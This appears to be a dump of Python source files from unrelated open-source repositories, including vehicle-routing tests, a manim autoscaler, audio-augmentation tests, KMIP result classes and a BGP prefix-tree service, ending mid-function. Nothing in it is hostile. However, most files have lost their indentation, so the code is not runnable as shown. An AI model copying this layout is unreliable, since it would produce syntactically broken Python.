if len(problem)==5:
N,pts,d,D,C = problem
L = None
else:
N,pts,d,D,C,L = problem
sol = list(solution)
if not PRINT_ONLY_FINAL_RESULT:
print("\nin", sol)
total_t = 0
while True:
start_t = time()
out_sol = do_3optstar_move(sol, D, d, C, L, strategy)
elapsed_t = time()-start_t
total_t+=elapsed_t
if not PRINT_ONLY_FINAL_RESULT:
print("elapsed %.2f s"%elapsed_t)
print("out (%s)\n"%_strategy_to_str(strategy))
            if out_sol[1] is None:
print("no more improvements found")
if PRINT_ONLY_FINAL_RESULT:
print("final (%s)"%_strategy_to_str(strategy),
sol, calculate_objective(sol, D))
print("total elapsed %.2f s"%total_t)
break
if not PRINT_ONLY_FINAL_RESULT:
print(out_sol, calculate_objective(out_sol[0], D))
sol = out_sol[0]
self.assertTrue( all(check_solution_feasibility(sol, D, d, C, L)), "must be feasible")
def test_random_problems_with_C_constraints_first_accept_from_naive_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
self._improve_with_3opt_star(self.problem, self.naive_sol, strategy=LSOPT.FIRST_ACCEPT)
def test_random_problems_with_C_constraints_best_accept_from_naive_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
self._improve_with_3opt_star(self.problem, self.naive_sol, strategy=LSOPT.BEST_ACCEPT)
def test_random_problems_with_L_constraints_first_accept_from_naive_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
problem_with_L = tuple( list(self.problem)+[self.L] )
self._improve_with_3opt_star(problem_with_L, self.naive_sol, strategy=LSOPT.FIRST_ACCEPT)
def test_random_problems_with_L_constraints_best_accept_from_naive_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
problem_with_L = tuple( list(self.problem)+[self.L] )
self._improve_with_3opt_star(problem_with_L, self.naive_sol, strategy=LSOPT.BEST_ACCEPT)
def test_random_problems_with_C_constraints_first_accept_from_nn_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
self._improve_with_3opt_star(self.problem, self.nn_sol, strategy=LSOPT.FIRST_ACCEPT)
def test_random_problems_with_C_constraints_best_accept_from_nn_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
self._improve_with_3opt_star(self.problem, self.nn_sol, strategy=LSOPT.BEST_ACCEPT)
def test_random_problems_with_L_constraints_first_accept_from_nn_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
problem_with_L = tuple( list(self.problem)+[self.L] )
self._improve_with_3opt_star(problem_with_L, self.nn_sol, strategy=LSOPT.FIRST_ACCEPT)
def test_random_problems_with_L_constraints_best_accept_from_nn_sol(self):
print("\n\nTEST RANDOM PROBLEM WITH %d CUSTOMERS, NAIVE INITIAL SOLUTION"%self.N)
problem_with_L = tuple( list(self.problem)+[self.L] )
self._improve_with_3opt_star(problem_with_L, self.nn_sol, strategy=LSOPT.BEST_ACCEPT)
if __name__=="__main__":
unittest.main()
if len(sys.argv)<=1 or "TestRandomStressOn3OptStarSolutionOperator" in sys.argv:
#for N in range(70,101,10):
for N in range(5,15):
TestRandomStressOn3OptStarSolutionOperator.problem_size = N
wasSuccessful = unittest.main(exit=False, argv=["TestRandomStressOn3OptStarSolutionOperator"]).result.wasSuccessful()
if not wasSuccessful:
sys.exit(1)
|
code_video/autoscale.py
|
mrdon/code-video-generator
| 196 |
78604
|
from dataclasses import dataclass
from typing import Tuple
from manim import config
from manim import DEFAULT_MOBJECT_TO_EDGE_BUFFER
from manim import DEFAULT_MOBJECT_TO_MOBJECT_BUFFER
from manim import DOWN
from manim import LEFT
from manim import Mobject
from manim import np
from manim import ORIGIN
from manim import Polygon
from manim import RIGHT
from manim import UP
from wrapt import ObjectProxy
WIDTH_THIRD = (config["frame_x_radius"] * 2) / 3
@dataclass
class Bounds:
ul: Tuple[float, float, float] = None
ur: Tuple[float, float, float] = None
dr: Tuple[float, float, float] = None
dl: Tuple[float, float, float] = None
@property
def width(self):
return abs(self.ul[0] - self.ur[0])
@property
def height(self):
return abs(self.ur[1] - self.dr[1])
def as_mobject(self) -> Polygon:
return Polygon(self.ul, self.ur, self.dr, self.dl)
class AutoScaled(ObjectProxy):
"""
Autoscales whatever it wraps on changes in placement including:
* `next_to`
* `to_edge`
* `set_x`
* `set_y`
* `move_to`
"""
def __init__(self, delegate: Mobject, rescale: bool = True):
"""
Args:
delegate: The object to scale
rescale: Whether to rescale the object immediately or not
"""
super().__init__(delegate)
self._overall_scale_factor: float = 1
self._bounds = Bounds()
self.reset_bounds()
if rescale:
self.autoscale(ORIGIN)
def scale(self, scale_factor, **kwargs):
self._overall_scale_factor *= scale_factor
self.__wrapped__.scale(scale_factor, **kwargs)
return self
def copy(self):
result = self.__wrapped__.copy()
wrapper = AutoScaled(result, False)
wrapper._bounds = self._bounds
wrapper._overall_scale_factor = self._overall_scale_factor
return wrapper
def next_to(self, mobject_or_point, direction=RIGHT, **kwargs):
self.__wrapped__.next_to(mobject_or_point, direction, **kwargs)
self._update_bounds_to_direction(direction * -1)
self.autoscale(direction * -1)
return self
def move_to(self, point_or_mobject, aligned_edge=ORIGIN, coor_mask=np.array([1, 1, 1])):
self.__wrapped__.move_to(point_or_mobject, aligned_edge, coor_mask)
self._update_bounds_to_direction(aligned_edge)
self.autoscale(aligned_edge)
return self
def set_x(self, x, direction=ORIGIN):
self.__wrapped__.set_x(x, direction)
self._update_bounds_to_direction(direction)
self.autoscale(direction)
return self
def fill_between_x(self, x_left: float, x_right: float):
"""
Autoscales between two X values
"""
self._bounds.ur = np.array((x_right, self._bounds.ur[1], self._bounds.ur[2]))
self._bounds.dr = np.array((x_right, self._bounds.dr[1], self._bounds.dr[2]))
self.set_x(x_left, LEFT)
self._update_bounds_to_direction(LEFT)
self.autoscale(LEFT)
return self
def set_y(self, y, direction=ORIGIN):
self.__wrapped__.set_y(y)
self._update_bounds_to_direction(direction)
self.autoscale(direction)
return self
def full_size(self):
"""
Resets the scaling to full screen
"""
self.reset_bounds()
self.__wrapped__.center()
self.autoscale(ORIGIN)
return self
def reset_bounds(self):
x_rad = config["frame_x_radius"]
y_rad = config["frame_y_radius"]
buff = DEFAULT_MOBJECT_TO_MOBJECT_BUFFER
self._bounds.ul = np.array((x_rad * -1 + buff, y_rad - buff, 0))
self._bounds.ur = np.array((x_rad - buff, y_rad - buff, 0))
self._bounds.dr = np.array((x_rad - buff, y_rad * -1 + buff, 0))
self._bounds.dl = np.array((x_rad * -1 + buff, y_rad * -1 + buff, 0))
return self
def to_edge(self, edge=LEFT, buff=DEFAULT_MOBJECT_TO_EDGE_BUFFER):
self.__wrapped__.to_edge(edge, buff)
self._update_bounds_to_direction(edge)
self.autoscale(edge)
return self
def autoscale(self, direction: np.array):
"""
Manually autoscales in a given direction
Args:
direction: The direction to scale in
"""
if not self.__wrapped__.get_width() or not self.__wrapped__.get_height():
return
x_scale = self._bounds.width / self.__wrapped__.get_width()
y_scale = self._bounds.height / self.__wrapped__.get_height()
self.scale(min(x_scale, y_scale), about_point=self._bounds.as_mobject().get_critical_point(direction))
def _update_bounds_to_direction(self, direction: np.array):
if direction[0] == -1:
new_x = self.__wrapped__.get_x(LEFT)
self._bounds.ul = np.array((new_x, self._bounds.ul[1], self._bounds.ul[2]))
self._bounds.dl = np.array((new_x, self._bounds.dl[1], self._bounds.dl[2]))
elif direction[0] == 1:
new_x = self.__wrapped__.get_x(RIGHT)
self._bounds.ur = np.array((new_x, self._bounds.ur[1], self._bounds.ur[2]))
self._bounds.dr = np.array((new_x, self._bounds.dr[1], self._bounds.dr[2]))
if direction[1] == -1:
new_y = self.__wrapped__.get_y(DOWN)
self._bounds.dr = np.array((self._bounds.dr[0], new_y, self._bounds.dr[2]))
self._bounds.dl = np.array((self._bounds.dl[0], new_y, self._bounds.dl[2]))
elif direction[1] == 1:
new_y = self.__wrapped__.get_y(UP)
self._bounds.ur = np.array((self._bounds.ur[0], new_y, self._bounds.ur[2]))
self._bounds.ul = np.array((self._bounds.ul[0], new_y, self._bounds.ul[2]))
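# Hedged usage sketch: the wrap-then-place pattern the class docstring describes.
# `Square` is just a stand-in manim mobject chosen for illustration.
def _example_autoscaled():
    from manim import Square  # local import keeps the sketch self-contained
    panel = AutoScaled(Square())
    panel.to_edge(LEFT)   # placement call triggers a rescale toward the left edge
    panel.full_size()     # reset bounds and rescale to fill the whole frame again
    return panel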
|
tests/test_mp3_compression.py
|
jeongyoonlee/audiomentations
| 930 |
78612
|
import unittest
import numpy as np
from audiomentations.augmentations.transforms import Mp3Compression
from audiomentations.core.composition import Compose
class TestMp3Compression(unittest.TestCase):
def test_apply_mp3_compression_pydub(self):
sample_len = 44100
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 44100
augmenter = Compose(
[Mp3Compression(p=1.0, min_bitrate=48, max_bitrate=48, backend="pydub")]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertGreaterEqual(len(samples_out), sample_len)
self.assertLess(len(samples_out), sample_len + 2500)
def test_apply_mp3_compression_lameenc(self):
sample_len = 44100
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 44100
augmenter = Compose(
[Mp3Compression(p=1.0, min_bitrate=48, max_bitrate=48, backend="lameenc")]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertGreaterEqual(len(samples_out), sample_len)
self.assertLess(len(samples_out), sample_len + 2500)
def test_apply_mp3_compression_low_bitrate_pydub(self):
sample_len = 16000
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose(
[Mp3Compression(p=1.0, min_bitrate=8, max_bitrate=8, backend="pydub")]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertGreaterEqual(len(samples_out), sample_len)
self.assertLess(len(samples_out), sample_len + 2500)
def test_apply_mp3_compression_low_bitrate_lameenc(self):
sample_len = 16000
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose(
[Mp3Compression(p=1.0, min_bitrate=8, max_bitrate=8, backend="lameenc")]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertGreaterEqual(len(samples_out), sample_len)
self.assertLess(len(samples_out), sample_len + 2500)
def test_invalid_argument_combination(self):
with self.assertRaises(AssertionError):
_ = Mp3Compression(min_bitrate=400, max_bitrate=800)
with self.assertRaises(AssertionError):
_ = Mp3Compression(min_bitrate=2, max_bitrate=4)
with self.assertRaises(AssertionError):
_ = Mp3Compression(min_bitrate=64, max_bitrate=8)
|
dbaas/drivers/mysqlpercona.py
|
didindinn/database-as-a-service
| 303 |
78614
|
from . import mysqldb
from physical.models import Instance
class MySQLPercona(mysqldb.MySQL):
def get_default_instance_type(self):
return Instance.MYSQL_PERCONA
@classmethod
def topology_name(cls):
return ['mysql_percona_single']
class MySQLPerconaFOXHA(mysqldb.MySQLFOXHA):
def get_default_instance_type(self):
return Instance.MYSQL_PERCONA
@classmethod
def topology_name(cls):
return ['mysql_percona_foxha']
|
Python3/982.py
|
rakhi2001/ecom7
| 854 |
78659
|
<reponame>rakhi2001/ecom7
__________________________________________________________________________________________________
sample 476 ms submission
from typing import List
import collections
class Solution:
def countTriplets(self, A: List[int]) -> int:
n=len(A)
tmp=[bin(a)[2:].zfill(16) for a in A]
one={}
for i,a in enumerate(zip(*tmp)):
one[i]=set([i for i,v in enumerate(list(a)) if v=='1'])
Venn = collections.defaultdict(list)
cnt = 0
for j in range(len(one)):
if len(one[j]) != 0:
cnt += (len(one[j]))**3
for i in range(j, 0, -1):
for prv in Venn[i]:
intersec = prv & one[j]
if len(intersec) != 0:
cnt += ((-1)**i)*(len(intersec))**3
Venn[i+1].append(intersec)
Venn[1].append(one[j])
return n**3 - cnt
__________________________________________________________________________________________________
sample 16336 kb submission
class Solution:
def countTriplets(self, A: 'List[int]') -> 'int':
counts = {}
for a1 in A:
for a2 in A:
x = a1 & a2
if x in counts:
counts[x] += 1
else:
counts[x] = 1
tot = 0
for key in counts:
for a in A:
if a & key == 0:
tot += counts[key]
return tot
__________________________________________________________________________________________________
|
kmip/services/results.py
|
ondrap/PyKMIP
| 179 |
78665
|
# Copyright (c) 2014 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class OperationResult(object):
def __init__(self,
result_status,
result_reason=None,
result_message=None):
self.result_status = result_status
if result_reason is not None:
self.result_reason = result_reason
else:
self.result_reason = None
if result_message is not None:
self.result_message = result_message
else:
self.result_message = None
class CreateResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
object_type=None,
uuid=None,
template_attribute=None):
super(CreateResult, self).__init__(
result_status, result_reason, result_message)
if object_type is not None:
self.object_type = object_type
else:
self.object_type = None
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
if template_attribute is not None:
self.template_attribute = template_attribute
else:
self.template_attribute = None
class CreateKeyPairResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
private_key_uuid=None,
public_key_uuid=None,
private_key_template_attribute=None,
public_key_template_attribute=None):
super(CreateKeyPairResult, self).__init__(
result_status, result_reason, result_message)
self.private_key_uuid = private_key_uuid
self.public_key_uuid = public_key_uuid
self.private_key_template_attribute = private_key_template_attribute
self.public_key_template_attribute = public_key_template_attribute
class ActivateResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuid=None):
super(ActivateResult, self).__init__(
result_status, result_reason, result_message)
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
class RegisterResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuid=None,
template_attribute=None):
super(RegisterResult, self).__init__(
result_status, result_reason, result_message)
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
if template_attribute is not None:
self.template_attribute = template_attribute
else:
self.template_attribute = None
class RekeyKeyPairResult(CreateKeyPairResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
private_key_uuid=None,
public_key_uuid=None,
private_key_template_attribute=None,
public_key_template_attribute=None):
super(RekeyKeyPairResult, self).__init__(
result_status, result_reason, result_message, private_key_uuid,
public_key_uuid, private_key_template_attribute,
public_key_template_attribute)
class GetResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
object_type=None,
uuid=None,
secret=None):
super(GetResult, self).__init__(
result_status, result_reason, result_message)
if object_type is not None:
self.object_type = object_type
else:
self.object_type = None
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
if secret is not None:
self.secret = secret
else:
self.secret = None
class GetAttributesResult(OperationResult):
def __init__(
self,
result_status,
result_reason=None,
result_message=None,
uuid=None,
attributes=None
):
super(GetAttributesResult, self).__init__(
result_status,
result_reason,
result_message
)
self.uuid = uuid
self.attributes = attributes
class GetAttributeListResult(OperationResult):
def __init__(
self,
result_status,
result_reason=None,
result_message=None,
uid=None,
names=None):
super(GetAttributeListResult, self).__init__(
result_status, result_reason, result_message)
self.uid = uid
self.names = names
class DestroyResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuid=None):
super(DestroyResult, self).__init__(
result_status, result_reason, result_message)
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
class LocateResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuids=None):
super(LocateResult, self).__init__(
result_status, result_reason, result_message)
self.uuids = uuids
class QueryResult(OperationResult):
"""
A container for the results of a Query operation.
Attributes:
result_status: The status of the Query operation (e.g., success or
failure).
result_reason: The reason for the operation status.
result_message: Extra information pertaining to the status reason.
operations: A list of Operations supported by the server.
object_types: A list of Object Types supported by the server.
        vendor_identification: A string identifying the vendor of the server.
        server_information: A structure containing vendor-specific server details.
application_namespaces: A list of namespaces supported by the server.
extension_information: A list of extensions supported by the server.
"""
def __init__(self,
result_status,
result_reason=None,
result_message=None,
operations=None,
object_types=None,
vendor_identification=None,
server_information=None,
application_namespaces=None,
extension_information=None):
super(QueryResult, self).__init__(
result_status, result_reason, result_message)
if operations is None:
self.operations = list()
else:
self.operations = operations
if object_types is None:
self.object_types = list()
else:
self.object_types = object_types
self.vendor_identification = vendor_identification
self.server_information = server_information
if application_namespaces is None:
self.application_namespaces = list()
else:
self.application_namespaces = application_namespaces
if extension_information is None:
self.extension_information = list()
else:
self.extension_information = extension_information
class DiscoverVersionsResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
protocol_versions=None):
super(DiscoverVersionsResult, self).__init__(
result_status, result_reason, result_message)
self.protocol_versions = protocol_versions
class RevokeResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
unique_identifier=None):
super(RevokeResult, self).__init__(
result_status, result_reason, result_message)
self.unique_identifier = unique_identifier
class MACResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuid=None,
mac_data=None):
super(MACResult, self).__init__(
result_status,
result_reason,
result_message
)
self.uuid = uuid
self.mac_data = mac_data
|
Alignment/CommonAlignmentProducer/python/ALCARECOTkAlCosmicsInCollisions_cff.py
|
ckamtsikis/cmssw
| 852 |
78687
|
# Author : <NAME>
# Date : July 1st, 2010
# last update: $Date: 2010/03/17 18:17:34 $ by $Author: mussgill $
import FWCore.ParameterSet.Config as cms
#_________________________________HLT bits___________________________________________
import HLTrigger.HLTfilters.hltHighLevel_cfi
ALCARECOTkAlCosmicsInCollisionsHLT = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone(
andOr = True, ## choose logical OR between Triggerbits
eventSetupPathsKey = 'TkAlCosmicsInCollisions',
throw = False # tolerate triggers not available
)
# DCS partitions
# "EBp","EBm","EEp","EEm","HBHEa","HBHEb","HBHEc","HF","HO","RPC"
# "DT0","DTp","DTm","CSCp","CSCm","CASTOR","TIBTID","TOB","TECp","TECm"
# "BPIX","FPIX","ESp","ESm"
import DPGAnalysis.Skims.skim_detstatus_cfi
ALCARECOTkAlCosmicsInCollisionsDCSFilter = DPGAnalysis.Skims.skim_detstatus_cfi.dcsstatus.clone(
DetectorType = cms.vstring('TIBTID','TOB','TECp','TECm','BPIX','FPIX'),
ApplyFilter = cms.bool(True),
AndOr = cms.bool(True),
DebugOn = cms.untracked.bool(False)
)
#_________________________ Cosmic During Collisions__________________________________
from RecoTracker.SpecialSeedGenerators.cosmicDC_cff import *
#________________________________Track selection____________________________________
# AlCaReco for track based alignment using Cosmic muons reconstructed by Cosmics during collisions
import Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi
ALCARECOTkAlCosmicsInCollisions = Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi.AlignmentTrackSelector.clone(
src = 'cosmicDCTracks',
filter = True,
applyBasicCuts = True,
ptMin = 0., ##10
ptMax = 99999.,
pMin = 4., ##10
pMax = 99999.,
etaMin = -99., ##-2.4 keep also what is going through...
etaMax = 99., ## 2.4 ...both TEC with flat slope
nHitMin = 7,
nHitMin2D = 2,
chi2nMax = 999999.,
applyMultiplicityFilter = False,
applyNHighestPt = True, ## select only highest pT track
nHighestPt = 1
)
#________________________________Sequences____________________________________
seqALCARECOTkAlCosmicsInCollisions = cms.Sequence(cosmicDCTracksSeq*ALCARECOTkAlCosmicsInCollisionsHLT+ALCARECOTkAlCosmicsInCollisionsDCSFilter+ALCARECOTkAlCosmicsInCollisions)
|
explorer/views/export.py
|
Patil2099/django-sql-explorer
| 1,729 |
78712
|
# -*- coding: utf-8 -*-
from django.db import DatabaseError
from django.http import HttpResponse
from explorer.exporters import get_exporter_class
from explorer.utils import url_get_params
def _export(request, query, download=True):
_fmt = request.GET.get('format', 'csv')
exporter_class = get_exporter_class(_fmt)
query.params = url_get_params(request)
delim = request.GET.get('delim')
exporter = exporter_class(query)
try:
output = exporter.get_output(delim=delim)
except DatabaseError as e:
msg = f"Error executing query {query.title}: {e}"
return HttpResponse(
msg, status=500
)
response = HttpResponse(
output,
content_type=exporter.content_type
)
if download:
response['Content-Disposition'] = \
f'attachment; filename="{exporter.get_filename()}"'
return response
|
rpython/jit/backend/llgraph/symbolic.py
|
nanjekyejoannah/pypy
| 381 |
78713
|
<reponame>nanjekyejoannah/pypy
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rtyper import rclass
Size2Type = [None] * 100
Type2Size = {}
def get_size(TYPE):
try:
return Type2Size[TYPE]
except KeyError:
size = len(Size2Type)
Size2Type.append(TYPE)
Type2Size[TYPE] = size
return size
TokenToField = [None] * 100
FieldToToken = {}
def get_field_token(STRUCT, fieldname):
try:
return FieldToToken[STRUCT, fieldname]
except KeyError:
token = (len(TokenToField), get_size(getattr(STRUCT, fieldname)))
TokenToField.append((STRUCT, fieldname))
FieldToToken[STRUCT, fieldname] = token
return token
get_field_token(rclass.OBJECT, 'typeptr') # force the index 1 for this
|
backend-services/prefixtree/core/prefixtree.py
|
cytechmobile/artemis
| 237 |
78719
|
<filename>backend-services/prefixtree/core/prefixtree.py
import multiprocessing as mp
from typing import Dict
from typing import List
from typing import NoReturn
import pytricia
import redis
import requests
import ujson as json
from artemis_utils import flatten
from artemis_utils import get_ip_version
from artemis_utils import get_logger
from artemis_utils import search_worst_prefix
from artemis_utils.constants import CONFIGURATION_HOST
from artemis_utils.envvars import RABBITMQ_URI
from artemis_utils.envvars import REDIS_HOST
from artemis_utils.envvars import REDIS_PORT
from artemis_utils.envvars import REST_PORT
from artemis_utils.rabbitmq import create_exchange
from artemis_utils.rabbitmq import create_queue
from artemis_utils.redis import ping_redis
from artemis_utils.translations import translate_asn_range
from artemis_utils.translations import translate_rfc2622
from kombu import Connection
from kombu import Consumer
from kombu import Producer
from kombu import serialization
from kombu import uuid
from kombu.mixins import ConsumerProducerMixin
from tornado.ioloop import IOLoop
from tornado.web import Application
from tornado.web import RequestHandler
# logger
log = get_logger()
# additional serializer for pg-amqp messages
serialization.register(
"txtjson", json.dumps, json.loads, content_type="text", content_encoding="utf-8"
)
# shared memory object locks
shared_memory_locks = {
"data_worker": mp.Lock(),
"prefix_tree": mp.Lock(),
"autoignore": mp.Lock(),
"monitored_prefixes": mp.Lock(),
"configured_prefix_count": mp.Lock(),
"config_timestamp": mp.Lock(),
"service_reconfiguring": mp.Lock(),
}
# global vars
SERVICE_NAME = "prefixtree"
def pytricia_to_dict(pyt_tree):
pyt_dict = {}
for prefix in pyt_tree:
pyt_dict[prefix] = pyt_tree[prefix]
return pyt_dict
def dict_to_pytricia(dict_tree, size=32):
pyt_tree = pytricia.PyTricia(size)
for prefix in dict_tree:
pyt_tree.insert(prefix, dict_tree[prefix])
return pyt_tree
def configure_prefixtree(msg, shared_memory_manager_dict):
config = msg
try:
# check newer config
config_timestamp = shared_memory_manager_dict["config_timestamp"]
if config["timestamp"] > config_timestamp:
shared_memory_locks["service_reconfiguring"].acquire()
shared_memory_manager_dict["service_reconfiguring"] = True
shared_memory_locks["service_reconfiguring"].release()
# calculate prefix tree
prefix_tree = {"v4": pytricia.PyTricia(32), "v6": pytricia.PyTricia(128)}
rules = config.get("rules", [])
for rule in rules:
rule_translated_origin_asn_set = set()
for asn in rule["origin_asns"]:
this_translated_asn_list = flatten(translate_asn_range(asn))
rule_translated_origin_asn_set.update(set(this_translated_asn_list))
rule["origin_asns"] = list(rule_translated_origin_asn_set)
rule_translated_neighbor_set = set()
for asn in rule["neighbors"]:
this_translated_asn_list = flatten(translate_asn_range(asn))
rule_translated_neighbor_set.update(set(this_translated_asn_list))
rule["neighbors"] = list(rule_translated_neighbor_set)
conf_obj = {
"origin_asns": rule["origin_asns"],
"neighbors": rule["neighbors"],
"prepend_seq": rule.get("prepend_seq", []),
"policies": list(set(rule.get("policies", []))),
"community_annotations": rule.get("community_annotations", []),
"mitigation": rule.get("mitigation", "manual"),
}
for prefix in rule["prefixes"]:
for translated_prefix in translate_rfc2622(prefix):
ip_version = get_ip_version(translated_prefix)
if prefix_tree[ip_version].has_key(translated_prefix):
node = prefix_tree[ip_version][translated_prefix]
else:
node = {
"prefix": translated_prefix,
"data": {"confs": []},
"timestamp": config["timestamp"],
}
prefix_tree[ip_version].insert(translated_prefix, node)
node["data"]["confs"].append(conf_obj)
# calculate the monitored and configured prefixes
configured_prefix_count = 0
monitored_prefixes = set()
for ip_version in prefix_tree:
for prefix in prefix_tree[ip_version]:
configured_prefix_count += 1
monitored_prefix = search_worst_prefix(
prefix, prefix_tree[ip_version]
)
if monitored_prefix:
monitored_prefixes.add(monitored_prefix)
# extract autoignore rules
autoignore_rules = config.get("autoignore", {})
# calculate autoignore prefix tree
autoignore_prefix_tree = {
"v4": pytricia.PyTricia(32),
"v6": pytricia.PyTricia(128),
}
for key in autoignore_rules:
rule = autoignore_rules[key]
for prefix in rule["prefixes"]:
for translated_prefix in translate_rfc2622(prefix):
ip_version = get_ip_version(translated_prefix)
if not autoignore_prefix_tree[ip_version].has_key(
translated_prefix
):
node = {"prefix": translated_prefix, "rule_key": key}
autoignore_prefix_tree[ip_version].insert(
translated_prefix, node
)
# note that the object should be picklable (e.g., dict instead of pytricia tree,
# see also: https://github.com/jsommers/pytricia/issues/20)
shared_memory_locks["prefix_tree"].acquire()
dict_prefix_tree = {
"v4": pytricia_to_dict(prefix_tree["v4"]),
"v6": pytricia_to_dict(prefix_tree["v6"]),
}
shared_memory_manager_dict["prefix_tree"] = dict_prefix_tree
shared_memory_manager_dict["prefix_tree_recalculate"] = True
shared_memory_locks["prefix_tree"].release()
shared_memory_locks["monitored_prefixes"].acquire()
shared_memory_manager_dict["monitored_prefixes"] = list(monitored_prefixes)
shared_memory_locks["monitored_prefixes"].release()
shared_memory_locks["configured_prefix_count"].acquire()
shared_memory_manager_dict[
"configured_prefix_count"
] = configured_prefix_count
shared_memory_locks["configured_prefix_count"].release()
# note that the object should be picklable (e.g., dict instead of pytricia tree,
# see also: https://github.com/jsommers/pytricia/issues/20)
dict_autoignore_prefix_tree = {
"v4": pytricia_to_dict(autoignore_prefix_tree["v4"]),
"v6": pytricia_to_dict(autoignore_prefix_tree["v6"]),
}
shared_memory_locks["autoignore"].acquire()
shared_memory_manager_dict["autoignore_rules"] = autoignore_rules
shared_memory_manager_dict[
"autoignore_prefix_tree"
] = dict_autoignore_prefix_tree
shared_memory_manager_dict["autoignore_recalculate"] = True
shared_memory_locks["autoignore"].release()
shared_memory_locks["config_timestamp"].acquire()
shared_memory_manager_dict["config_timestamp"] = config["timestamp"]
shared_memory_locks["config_timestamp"].release()
shared_memory_locks["service_reconfiguring"].acquire()
shared_memory_manager_dict["service_reconfiguring"] = False
shared_memory_locks["service_reconfiguring"].release()
return {"success": True, "message": "configured"}
except Exception:
log.exception("exception")
shared_memory_locks["service_reconfiguring"].acquire()
shared_memory_manager_dict["service_reconfiguring"] = False
shared_memory_locks["service_reconfiguring"].release()
return {"success": False, "message": "error during service configuration"}
class ConfigHandler(RequestHandler):
"""
REST request handler for configuration.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Provides current configuration primitives (in the form of a JSON dict) to the requester.
Format:
{
"prefix_tree": {
"v4": <dict>,
"v6": <dict>
},
"prefix_tree_recalculate": <bool>,
"monitored_prefixes": <list>,
"configured_prefix_count": <int>,
"autoignore_rules": <dict>,
"autoignore_prefix_tree": {
"v4": <dict>,
"v6": <dict>
},
"autoignore_recalculate": <bool>,
"config_timestamp": <timestamp>
}
"""
ret_dict = {}
ret_dict["prefix_tree"] = self.shared_memory_manager_dict["prefix_tree"]
ret_dict["prefix_tree_recalculate"] = self.shared_memory_manager_dict[
"prefix_tree_recalculate"
]
ret_dict["monitored_prefixes"] = self.shared_memory_manager_dict[
"monitored_prefixes"
]
ret_dict["configured_prefix_count"] = self.shared_memory_manager_dict[
"configured_prefix_count"
]
ret_dict["autoignore_rules"] = self.shared_memory_manager_dict[
"autoignore_rules"
]
ret_dict["autoignore_prefix_tree"] = self.shared_memory_manager_dict[
"autoignore_prefix_tree"
]
ret_dict["autoignore_recalculate"] = self.shared_memory_manager_dict[
"autoignore_recalculate"
]
ret_dict["config_timestamp"] = self.shared_memory_manager_dict[
"config_timestamp"
]
self.write(ret_dict)
def post(self):
"""
Configures prefix tree and responds with a success message.
:return: {"success": True | False, "message": < message >}
"""
try:
msg = json.loads(self.request.body)
self.write(configure_prefixtree(msg, self.shared_memory_manager_dict))
except Exception:
self.write(
{"success": False, "message": "error during service configuration"}
)
class HealthHandler(RequestHandler):
"""
REST request handler for health checks.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Extract the status of a service via a GET request.
:return: {"status" : <unconfigured|running|stopped><,reconfiguring>}
"""
status = "stopped"
shared_memory_locks["data_worker"].acquire()
if self.shared_memory_manager_dict["data_worker_running"]:
status = "running"
shared_memory_locks["data_worker"].release()
